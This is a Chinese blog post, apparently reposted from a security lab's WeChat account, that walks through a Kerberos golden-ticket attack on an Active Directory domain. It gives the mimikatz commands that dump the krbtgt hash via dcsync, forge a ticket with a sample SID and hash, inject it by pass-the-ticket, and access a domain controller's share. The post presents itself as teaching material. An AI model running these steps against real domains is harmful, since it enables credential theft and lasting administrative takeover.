黄金票据——域渗透

admin

144543
文章

118
评论

2025年6月10日19:02:58评论23 views字数 1309阅读4分21秒阅读模式

声明

以下内容，均为文章作者原创，由于传播，利用此文所提供的信息而造成的任何直接或间接的后果和损失，均由使用者本人负责，长白山攻防实验室以及文章作者不承担任何责任。

0x01前言

黄金票据是伪造票据授予票据（TGT），也被称为认证票据。攻击者一旦拿到域管权限的账号就可以伪造出黄金票据，逃过账号和密码的验证，即使修改管理员密码，攻击者依然能通过黄金票据进行访问。

0x02原理

kerberos认证中Client通过AS认证后，AS会给Client一个由Client的Master Key加密过的和TGT，Logon Session Key并不会保存在KDC中，krbtgt的NTLM Hash又是固定的，所以只要得到NTLM就能伪造TGT和Logon session key，直接进入到下一步的Client与TGS的交互。

一、前提

1.票据制造前提

1.1域名称

1.2域的SID值

1.3域的KRBTGT账号的HASH

二、获取域内基本信息

2.域控内收集信息

2.1 获取域SID：

wmic useraccount list brief

2.2 查询域管理员账号：

net group "domain admins" /domain

2.3查询域名

ipconfig /all

2.4获取NTLM HASH

mimikatz(commandline) # privilege::debug mimikatz(commandline) # lsadump::dcsync /domain:域名 /all /csv mimikatz(commandline) # lsadump::dcsync /domain:域名 /user:krbtgt (可以获得NTLM hash值)

该方法使用mimikatz工具的dcsync功能远程转储活动目录AD中的ntds.dit指定的 /user 参数，可以只导出 krbtgt 账号信息。

0x03利用

操作如下：

1、清空内存

mimikatz# kerberos::purge

2、构造出用户为cc的票据，在当前目录下可以看见cc.kiribi

kerberos::golden /admin:cc /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:58e91a5ac358d86513ab224312314061 /ticket:cc.kiribi

3、传递票据并注入内存

将kiribi传入到域内其他机器，然后注入到内存中

mimikatz # kerberos::ptt cc.kiribi 黄金票据——域渗透

4、查看注入的票据

域内主机下查看Klist

mimikatz# kerberos::tgt

0x04权限验证

dir \owac$

成功读取到域控C盘下目录

0x05高手过招点到为止

黄金票据等于是复刻了一把带有域控管理员权限的钥匙，当域控权限丢失后，仍然可以利用票据重新获取最高权限。

原文始发于微信公众号（长白山攻防实验室）：黄金票据——域渗透

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

黄金票据——域渗透

JS逆向某单词js逆向补环境

如何在密码重置链接中使用主机头注入来入侵账户 — $$$$

Linux 内核 OverlayFS 漏洞 (CVE-2023-0386) 被利用来提升 Root 权限

忧郁（Noroff）：朝鲜复杂的 Web3 入侵

浅谈常见EDU漏洞，逻辑漏洞、越权、接管、getshell，小白如何快速找准漏洞

使用 NTLM 反射进行 Pwning 反射

100 个 Web 应用漏洞类型挖掘

什么？一次红队行动差点让我财富自由了

如何快速提升红蓝对抗技术

SQL注入：所有概念、所有有效载荷，尽在一处

发表评论

在线咨询

微信